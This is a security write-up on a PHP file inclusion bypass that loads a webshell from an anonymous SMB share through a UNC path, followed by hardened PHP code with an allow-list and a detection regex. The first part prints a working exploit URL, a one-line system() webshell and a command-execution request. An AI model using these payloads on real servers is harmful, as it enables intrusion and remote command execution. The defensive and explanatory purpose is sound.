PHP LFI/RFI Vulnerability attack bypassing remote URL inclusion restriction
File Inclusion vulnerability
In the PHP configuration, the "allow_url_include" directive is set to "Off" by default, which instructs PHP not to load remote HTTP or FTP URLs and so prevents Remote File Inclusion attacks. However, PHP does not block loading from SMB URLs (UNC paths) even when both "allow_url_include" and "allow_url_fopen" are set to "Off". This behaviour of PHP can be abused to load a remotely hosted PHP webshell from an SMB share.
Attack scenario outline
When the vulnerable PHP application code tries to load the PHP webshell from an attacker-controlled SMB share, the share must allow access to the file. The attacker therefore needs to configure the SMB server with anonymous browsing access enabled. Once the vulnerable application tries to access the PHP web shell on the SMB share, the SMB server will not ask for any credentials and the PHP code of the web shell will be included by the vulnerable application.
Verification environment
allow_url_fopen = Off
allow_url_include = Off
PHP version = 5.5.11
SMB server running with anonymous access
Exploiting
http://vulnerability_machine_ip/page.php?lang=\\exploit_ip\xxx\xx.php
We can add a PHP script (trojan.php) that calls the system function (a one-line trojan), such as:
<?php system($_REQUEST['cmd']); ?>
To use the trojan, we send a request such as:
http://vulnerability_machine_ip/page.php?lang=\\exploit_ip\trojan.php&cmd=whoami
The machine will execute the command.
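The following is an added example, not code from the original write-up: the kind of include() that the lang parameter above reaches, placed beside a hardened version and a request-level check that can feed logging. The file and directory names (page.php, a lang/ directory, the language codes) are assumptions. The reason the php.ini restriction does not help is that a UNC path such as \\host\share\file.php is never handled by a PHP URL wrapper; on a Windows host the operating system resolves it as a filesystem path, so allow_url_include only guards scheme-style targets like http:// and ftp://. The fix therefore has to live in the application code.

```php
<?php
// Added example (not from the original write-up). Names such as page.php,
// the lang/ directory and the language codes are assumptions.

// VULNERABLE: the request parameter reaches include() unchanged. With
// allow_url_include=Off, http:// and ftp:// targets are refused, but a UNC
// path (\\host\share\file.php) is resolved by the operating system as a
// filesystem path, so on a Windows host it is included like a local file.
function include_language_vulnerable(string $lang): void
{
    include $lang;
}

// Request-level check: flag anything that looks like a UNC path or a
// scheme:// wrapper before it gets near include(). Useful as a log/alert
// trigger as well as a guard.
function looks_like_remote_include(string $value): bool
{
    // \\host\share... or //host/share...   -> UNC path
    // http://, ftp://, phar://, php://, ... -> stream wrapper
    return (bool) preg_match('~^(\\\\\\\\|//)[^\\\\/]+[\\\\/]|^[a-z][a-z0-9+.-]*://~i', $value);
}

// HARDENED: map the untrusted identifier onto an allow-list and confirm the
// resolved path stays inside the intended directory. This fixes the bug at
// its root instead of relying on php.ini, which the SMB trick sidesteps.
function resolve_language_file(string $lang): ?string
{
    $allowed = ['en', 'de', 'fr'];          // assumed set of shipped languages
    if (!in_array($lang, $allowed, true)) {
        return null;
    }
    $base = realpath(__DIR__ . '/lang');
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $lang . '.php');
    // Defence in depth: the canonical path must start with the base directory.
    if ($path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// page.php (hardened) usage:
$lang = (string) ($_GET['lang'] ?? 'en');
if (looks_like_remote_include($lang)) {
    error_log('blocked include attempt: ' . $lang);   // feeds detection
    http_response_code(400);
    exit;
}
$file = resolve_language_file($lang);
if ($file === null) {
    http_response_code(400);
    exit;
}
include $file;
```

The allow-list is the real control: once only known identifiers are accepted, neither a UNC path nor a local traversal can reach include(). The realpath check and the looks_like_remote_include() filter are defence in depth, and the error_log() call gives operations a line to alert on when a request carries a \\host\share style value.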